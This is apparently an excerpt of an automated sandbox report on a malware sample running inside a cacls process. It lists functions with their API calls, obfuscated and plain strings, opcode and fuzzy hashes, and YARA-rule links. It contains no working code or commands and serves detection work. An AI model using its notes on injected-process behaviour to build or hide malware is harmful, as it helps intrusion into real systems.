                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID: -69O$G8uE$G8uE-69OL$G8uE-69OL
                                                  • API String ID: 1836367815-2690296174
                                                  • Opcode ID: 28272f5a9f00065ab4a979efd9e22b4eb7f268d9fc5e0e159ecd20fa662c64f1
                                                  • Instruction ID: c87ab3ea53e482197bf7506c9c277e9bbdd23571d2bb44ddcd667854d94a385f
                                                  • Opcode Fuzzy Hash: 28272f5a9f00065ab4a979efd9e22b4eb7f268d9fc5e0e159ecd20fa662c64f1
                                                  • Instruction Fuzzy Hash: CD11C232D4020C7ADB208FA4DC81FBE7B799F40714F154154ED14BB241C77566078BA1
                                                  Function 02C60C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 57threadwindowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 02C60D0A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID: -69O$G8uE$G8uE-69OL$G8uE-69OL
                                                  • API String ID: 1836367815-2690296174
                                                  • Opcode ID: 146819769964985c45f488e57cf89423b7d81f68912be6efb1b967de7cba7aea
                                                  • Instruction ID: fd329ad27779497f4826c01737016f58e377d3415325b9be6c990b6fe625550d
                                                  • Opcode Fuzzy Hash: 146819769964985c45f488e57cf89423b7d81f68912be6efb1b967de7cba7aea
                                                  • Instruction Fuzzy Hash: A601F571E4021C76EB20AAD08C46FEF7B7C9F40B54F158154FB14BB281DBB86A068BE5
                                                  Function 02C736FB Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 165COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 0-1269752229
                                                  • Opcode ID: 9e57cd62c77c9976a5e72e8901f5c7ab6af17ed0477acd941c53cc19eb5aecac
                                                  • Instruction ID: 5cd8d026533282c98216a28a16862b4f9d245a8fe704bb0a7f741df6d71d4a38
                                                  • Opcode Fuzzy Hash: 9e57cd62c77c9976a5e72e8901f5c7ab6af17ed0477acd941c53cc19eb5aecac
                                                  • Instruction Fuzzy Hash: E251A8B1515785ABC720CF74CD82BEABBB9FF84720F14429DE8988B281D734A601DB94
                                                  Function 02C73870 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 107sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNELBASE(000007D0), ref: 02C7393D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 3472027048-1269752229
                                                  • Opcode ID: 39b0fe9bf9027367a9dd8ced8dbe85eba1faf1f091034969d720b728d07959af
                                                  • Instruction ID: c09fafd1852fda9632accf71bb24edccb547d99b76285ec2d5e9f817da8d1d71
                                                  • Opcode Fuzzy Hash: 39b0fe9bf9027367a9dd8ced8dbe85eba1faf1f091034969d720b728d07959af
                                                  • Instruction Fuzzy Hash: 0D316EB1A01205BBD714DFA4CC84FEAB7B9FB88710F54415DEA1D6B240D670BA40CBA4
                                                  Function 02C6F30A Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InitializeUninitialize
                                                  • String ID: @J7<
                                                  • API String ID: 3442037557-2016760708
                                                  • Opcode ID: dcc28023b4d244da97b10819b5cccf7c2717b9b4e86d87ca22eff2a94bec158f
                                                  • Instruction ID: fc991ac0de8f328b63a2322aae3421006dcb0ea829830d9fc1d832e86480871d
                                                  • Opcode Fuzzy Hash: dcc28023b4d244da97b10819b5cccf7c2717b9b4e86d87ca22eff2a94bec158f
                                                  • Instruction Fuzzy Hash: 463121B5A0060AAFDB00DFD8D8809EFB7B9FF88304B148559E506EB614D775EE458BA0
                                                  Function 02C6F310 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InitializeUninitialize
                                                  • String ID: @J7<
                                                  • API String ID: 3442037557-2016760708
                                                  • Opcode ID: 7d983996f1c1de03426cc99a629d60e8e3b849dd5c8fc391227b868b2dc2953f
                                                  • Instruction ID: 7e5ba1cf02b68c1e84804287a79f0e237032c7aa6f9e11809126018d1a5598c0
                                                  • Opcode Fuzzy Hash: 7d983996f1c1de03426cc99a629d60e8e3b849dd5c8fc391227b868b2dc2953f
                                                  • Instruction Fuzzy Hash: 49313EB5A0020AAFDB00DFD8D8C09EFB7B9FF88304B148559E506EB214D775EE458BA0
                                                  Function 02C73866 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 98sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNELBASE(000007D0), ref: 02C7393D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 3472027048-1269752229
                                                  • Opcode ID: 067cea823e7bdf09a7354a0eb4e70b35c00d2a1b9e3fc0138ef9e364e978b7c2
                                                  • Instruction ID: 7fe4d6dd3c54019ec787959e2aebdbbe02afcebbc17ad85090f18d1f9e2e0138
                                                  • Opcode Fuzzy Hash: 067cea823e7bdf09a7354a0eb4e70b35c00d2a1b9e3fc0138ef9e364e978b7c2
                                                  • Instruction Fuzzy Hash: 753190B1A01345ABDB14DFA4C884FEABBB9FB88710F14415DE91D6F241C770AA40CFA4
                                                  Function 02C73858 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 77sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNELBASE(000007D0), ref: 02C7393D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 3472027048-1269752229
                                                  • Opcode ID: 40710ecf9b163c272d9dacf1cd088b85a754d41ded647786e9ecf2dc437d03fe
                                                  • Instruction ID: 3b077f05b8c1992b82c41af2b8783cf2ecac1d7f2291e0febaebbbe80b4d5ac6
                                                  • Opcode Fuzzy Hash: 40710ecf9b163c272d9dacf1cd088b85a754d41ded647786e9ecf2dc437d03fe
                                                  • Instruction Fuzzy Hash: ED21B0B1601245ABCB24DFA4D884BEAB7AAFBC8310F04415EE91D5B241D770A641DF94
                                                  Function 02C643C0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02C64432
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: 0396ba7618b5080a1dab921aa9300dfb6cdc16ec2d0a8df7c2b88b16f96075f0
                                                  • Instruction ID: 884788edeb0575cc58f202cc88d23e988fe45136450aec6dad358c054a5d612d
                                                  • Opcode Fuzzy Hash: 0396ba7618b5080a1dab921aa9300dfb6cdc16ec2d0a8df7c2b88b16f96075f0
                                                  • Instruction Fuzzy Hash: 100152B5D4020DA7DB10DBE0EC82FADB3799B44708F004195A90897141F631E714DB91
                                                  Function 02C796D0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessInternalW.KERNELBASE(00000231,00000259,00000031,?,02C68114,00000010,00000259,?,?,00000044,00000259,00000010,02C68114,?,00000031,00000259), ref: 02C79730
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInternalProcess
                                                  • String ID:
                                                  • API String ID: 2186235152-0
                                                  • Opcode ID: 947338cc5b1b2199bd388ab4760fdfbc553f9e757ce6301b49000155087a7d66
                                                  • Instruction ID: a24c63d7e7b953bcd1f8d665346872b6089d7fec2b553bf717f17c17c8f83b3a
                                                  • Opcode Fuzzy Hash: 947338cc5b1b2199bd388ab4760fdfbc553f9e757ce6301b49000155087a7d66
                                                  • Instruction Fuzzy Hash: 5E01C0B2204508BBCB44DE99DC84EEB77AEAF8D754F008208BA09A3240D670F8518BA4
                                                  Function 02C59D40 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02C59D82
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: 8f4c12bf7660e0b4e4e34a8828368cc8295c0d4b96a9adf18b598a45c2f36734
                                                  • Instruction ID: 4f46e1a76bb3bb9ba20d16eeb0b1f5fa1ab84140cf55970daec482fd14933076
                                                  • Opcode Fuzzy Hash: 8f4c12bf7660e0b4e4e34a8828368cc8295c0d4b96a9adf18b598a45c2f36734
                                                  • Instruction Fuzzy Hash: 89F06D333802143AE66075A99C02FDBB39CCBC0BA1F14006AFB0DEA1C0D9E1F94186E8
                                                  Function 02C59D3D Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02C59D82
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: 1d1c00300f589bd20d06c304be4c7422f6d4883d532f95705168c6f33e6b6fda
                                                  • Instruction ID: 93c5dcb84240eeb956cf4f931bb31778bca26ecdcf7d49eb0b06c458fd0c5e62
                                                  • Opcode Fuzzy Hash: 1d1c00300f589bd20d06c304be4c7422f6d4883d532f95705168c6f33e6b6fda
                                                  • Instruction Fuzzy Hash: CBE012737806103AE67165989C02FDB67999FD0B91F240159F60DEA1C0D9E5F98186A4
                                                  Function 02C79640 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,B48D02CA,00000007,00000000,00000004,00000000,02C63C30,000000F4), ref: 02C7967C
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 681bd1f20ea3189675e17e877edd0f8c4eeb3f41bfc2e57b4ac409f35e7157c1
                                                  • Instruction ID: 0699eac362d6166429daa0c5967d6eec0aed89bf8691c028263c12db9803ed85
                                                  • Opcode Fuzzy Hash: 681bd1f20ea3189675e17e877edd0f8c4eeb3f41bfc2e57b4ac409f35e7157c1
                                                  • Instruction Fuzzy Hash: 05E065B2200208BBD614EF58DC45FAB33ADEF89750F008408F908A7281DB70B9518BB8
                                                  Function 02C795F0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(02C61906,?,02C7549B,02C61906,02C7543F,02C7549B,?,02C61906,02C7543F,00001000,?,?,00000000), ref: 02C7962C
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 8a700a8c3a0a144c91516dd14f57180c07477dd7731598e4d6a2530fd7bb92eb
                                                  • Instruction ID: 74443d7963540fcfb8d87dd98ce9f30819d8fba0efae4dc31483eea8de2f01ea
                                                  • Opcode Fuzzy Hash: 8a700a8c3a0a144c91516dd14f57180c07477dd7731598e4d6a2530fd7bb92eb
                                                  • Instruction Fuzzy Hash: 7EE065B22002047BC710EE68EC45FAF37ADEFC9710F008008F908A7281DA70BD118BB8
                                                  Function 02C68150 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02C6817A
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: fb67a9732eab2338d542a3da3f61db0e4faed1bd2f49a5024c678f04934c2c3e
                                                  • Instruction ID: f54a32272d114cd10aa0e008da352f810914357931d1dad48d5f43faacf5c561
                                                  • Opcode Fuzzy Hash: fb67a9732eab2338d542a3da3f61db0e4faed1bd2f49a5024c678f04934c2c3e
                                                  • Instruction Fuzzy Hash: 0EE086B165020837EA1466AC9C8AFB633584B89668F5C4764B91DDB2C2D674F6414294
                                                  Function 02C67F48 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,02C61C00,02C77D7F,02C7543F,02C61BC3), ref: 02C67F81
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 7407a59633651a0d9b44c47295f06f261df319550b7d9f2bc08534099481599b
                                                  • Instruction ID: 223463d4d5121ddbbfbbda3eb3ae64715776f778a80e322eecb1b1c304ce7937
                                                  • Opcode Fuzzy Hash: 7407a59633651a0d9b44c47295f06f261df319550b7d9f2bc08534099481599b
                                                  • Instruction Fuzzy Hash: 49E0C2362943007FE600E7F4CC43FA633598B00694F094469FA4ED6282D9E1E2888A61
                                                  Function 02C67F50 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,02C61C00,02C77D7F,02C7543F,02C61BC3), ref: 02C67F81
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 165323b50b3a7d06a94c77d9813079bbeb65b32abf98992558c1d26b25edcb13
                                                  • Instruction ID: af8c5aa2b45033a5df4882a79252a2bb458483836761b3a2d61e1c3317d29064
                                                  • Opcode Fuzzy Hash: 165323b50b3a7d06a94c77d9813079bbeb65b32abf98992558c1d26b25edcb13
                                                  • Instruction Fuzzy Hash: AAD05E712943047BE600E7E99C47F66328E4B40694F084068BA0CE6282D991E2404AA5
                                                  Function 03442C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: bd30e0ebcbe16f56d676fc1d93e18c18272eba012334db531ba51687ab1f73fa
                                                  • Instruction ID: 79ec27378a6037507ec94bca564769a146f6e3dd68bf7a42335bf3f26fbf587e
                                                  • Opcode Fuzzy Hash: bd30e0ebcbe16f56d676fc1d93e18c18272eba012334db531ba51687ab1f73fa
                                                  • Instruction Fuzzy Hash: 7CB09B71D015C5C5EA11E76046087177904A7D0701F19C473F3030A51F4779C5D1E579

                                                  Non-executed Functions

                                                  Function 037204BF Relevance: .2, Instructions: 151COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2622636762.0000000003720000.00000040.00000800.00020000.00000000.sdmp, Offset: 03720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_3720000_cacls.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dfe410d2dab6e2868a1a4fbc50fb4d091e192fdba4d991d58a0f5a489b8105ad
                                                  • Instruction ID: 3b92bf86a4cb24cdebf6e90c9d18a2a937bd9fd059d11b7891189ce1041c04c5
                                                  • Opcode Fuzzy Hash: dfe410d2dab6e2868a1a4fbc50fb4d091e192fdba4d991d58a0f5a489b8105ad
                                                  • Instruction Fuzzy Hash: 3A41577461CF1D4FD328EF6990816BAF7E2FB49300F50062DC98BC3612EA70E8428799
                                                  Function 0372DDB2 Relevance: 56.5, Strings: 45, Instructions: 208COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2622636762.0000000003720000.00000040.00000800.00020000.00000000.sdmp, Offset: 03720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_3720000_cacls.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                  • API String ID: 0-3558027158
                                                  • Opcode ID: 6f9cfb7488fdfe9b9633c83f7e92c163e444720a5f09c3db3caa7a8db62042b4
                                                  • Instruction ID: a5fa2ee620117bfa64ce2c5cc1fe08046f82089478d8a6dca86ea634bb793843
                                                  • Opcode Fuzzy Hash: 6f9cfb7488fdfe9b9633c83f7e92c163e444720a5f09c3db3caa7a8db62042b4
                                                  • Instruction Fuzzy Hash: 2F9140F04083988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89458B95
                                                  Function 03442890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                  • API String ID: 48624451-2108815105
                                                  • Opcode ID: a3d324de83c355e43eb668f32bca74fab0ed3dd60fafd1b24eff6bc63f2a8a57
                                                  • Instruction ID: 25ced5a3b40fb80367fdbe1da787e7fc59e8f31086758d89b67cae881638bbf4
                                                  • Opcode Fuzzy Hash: a3d324de83c355e43eb668f32bca74fab0ed3dd60fafd1b24eff6bc63f2a8a57
                                                  • Instruction Fuzzy Hash: 2751D6B6A00116AFDB10DB98889097FFBB8BB09240754867BF465DB741D374DE508BA8
                                                  Function 034B2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                  • API String ID: 48624451-2108815105
                                                  • Opcode ID: bbc57cb7d908a8bedea5b03b5c6fa2ae4389f747809aac5adb76bd75a9b88415
                                                  • Instruction ID: a14d1305e33451a5a23445e0df1b99823cf1ce997ea20706bdb475e439d630ba
                                                  • Opcode Fuzzy Hash: bbc57cb7d908a8bedea5b03b5c6fa2ae4389f747809aac5adb76bd75a9b88415
                                                  • Instruction Fuzzy Hash: 1D5115B9A00645AECB60DE5CC9808BFB7FCAB44200B448C5BE4A5DB641D7B4DA008774
                                                  Function 03723B4E Relevance: 17.6, Strings: 14, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2622636762.0000000003720000.00000040.00000800.00020000.00000000.sdmp, Offset: 03720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_3720000_cacls.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %>)$ -c$'#cx$)8wl$*#4c$>#%($>:vx$b}wl$d"($lyb}$x}b|$yb|l$}b|e$}b|l
                                                  • API String ID: 0-3240095522
                                                  • Opcode ID: bd52c3bb3f82a3265ffe1b04729e48ed96b26f3fa5fd2570830a2189d95264a6
                                                  • Instruction ID: e4295591359cd37fd37f88933d8bf24c9d0136e42d9111633e28553d02644565
                                                  • Opcode Fuzzy Hash: bd52c3bb3f82a3265ffe1b04729e48ed96b26f3fa5fd2570830a2189d95264a6
                                                  • Instruction Fuzzy Hash: A61153B090071CCADF14DFD5E986BACBBB0FB04300F608249D415AB295D7345A52CF96
                                                  Function 03437630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 03474787
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03474655
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03474725
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03474742
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 034746FC
                                                  • ExecuteOptions, xrefs: 034746A0
                                                  • Execute=1, xrefs: 03474713
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 0-484625025
                                                  • Opcode ID: 32aa99f4ef060ba1fdbc72ce6088d25317a6e3ba60c1359f7f2be8f4bc9a9e9b
                                                  • Instruction ID: f655c064bfc2568e2a6cd9048ee8d2f04ad30a487d29c6597117f4346191b588
                                                  • Opcode Fuzzy Hash: 32aa99f4ef060ba1fdbc72ce6088d25317a6e3ba60c1359f7f2be8f4bc9a9e9b
                                                  • Instruction Fuzzy Hash: E75139B5A403196EDB10EBA5EC95FFE7BA8EB09310F0400AFD505AF290D7709A458B58
                                                  Function 03723A69 Relevance: 11.3, Strings: 9, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2622636762.0000000003720000.00000040.00000800.00020000.00000000.sdmp, Offset: 03720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_3720000_cacls.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$EOMX$IN\$MXEC$MZEJ$M\\@$TA@$XITX$\@EO
                                                  • API String ID: 0-211965245
                                                  • Opcode ID: 476ef9653e96847301a7c15a8dceeec6357f55e833e407861ab4cf837aa9f880
                                                  • Instruction ID: f4995c049ef627978e639774cf3de8c95c97612e2ba9f4b48fda10513c40ef52
                                                  • Opcode Fuzzy Hash: 476ef9653e96847301a7c15a8dceeec6357f55e833e407861ab4cf837aa9f880
